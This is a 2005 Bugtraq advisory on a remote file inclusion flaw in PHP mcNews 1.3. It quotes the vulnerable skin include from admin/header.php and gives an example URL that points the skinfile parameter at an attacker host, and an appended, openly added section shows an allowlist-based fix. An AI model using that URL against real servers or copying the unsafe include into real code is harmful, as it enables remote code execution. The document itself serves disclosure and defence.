Bugtraq mailing list archives
PHP mcNews <= 1.3 arbitrary file inclusion (VXSfx)
From: Filip Groszynski <groszynskif () gmail com>
Date: 7 Mar 2005 19:45:07 -0000
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Name:     PHP mcNews
Version:  1.3
Homepage: http://www.phpforums.net/index.php?dir=dld

Author:   Filip Groszynski (VXSfx)
Date:     7 March 2005

-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in mcNews/admin/header.php:

<?
// mcNews 1.3 Marc Cagninacci marc () phpforums net
?>
...
<?
if($voir!='')
{
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");
?>
...

--------------------------------------------------------

Example:

if register_globals=on and allow_url_fopen=on:

http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/

--------------------------------------------------------

Contact:

Author:   Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email:    groszynskif <at> gmail <dot> com
HP:       http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
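A hardened form of the skin include quoted in the advisory, as an added example that is not part of the original post or of mcNews. `strstr()` only returns the input from the first occurrence of 'skin' onward and does not constrain what follows, so the version below never builds the include path from request data; the `skins/` directory, the skin names and the `skin` request parameter are assumptions.

```php
<?php
// Added example: replacement for the skin include in admin/header.php.
// Assumptions (not from mcNews): skins live in ./skins/ as <name>.php,
// the allowed names are the ones listed here, and the directory exists.

const SKIN_DIR = __DIR__ . '/skins';
const ALLOWED_SKINS = ['default', 'blue', 'print'];   // hypothetical names

/**
 * Map a requested skin name to a file inside SKIN_DIR.
 * Anything not on the allowlist falls back to the default skin.
 */
function resolve_skin($requested): string
{
    // Non-strings (e.g. ?skin[]=x) and unknown names are never used in a path.
    if (!is_string($requested) || !in_array($requested, ALLOWED_SKINS, true)) {
        $requested = 'default';
    }
    $path = SKIN_DIR . '/' . $requested . '.php';

    // Defence in depth: the resolved file must exist and sit directly in
    // SKIN_DIR, so a symlink or a misconfigured allowlist cannot escape it.
    $real = realpath($path);
    if ($real === false || dirname($real) !== realpath(SKIN_DIR)) {
        throw new RuntimeException('skin file missing or outside skin directory');
    }
    return $real;
}

// Read the value explicitly from the request; the variable is always
// initialised here, so a register_globals-style injection has no effect.
$skinfile = resolve_skin($_GET['skin'] ?? 'default');
include $skinfile;
```

On current PHP versions, including a URL additionally requires `allow_url_include`, which is off by default, and `register_globals` was removed in PHP 5.4; the allowlist remains necessary because neither setting prevents inclusion of unintended local files.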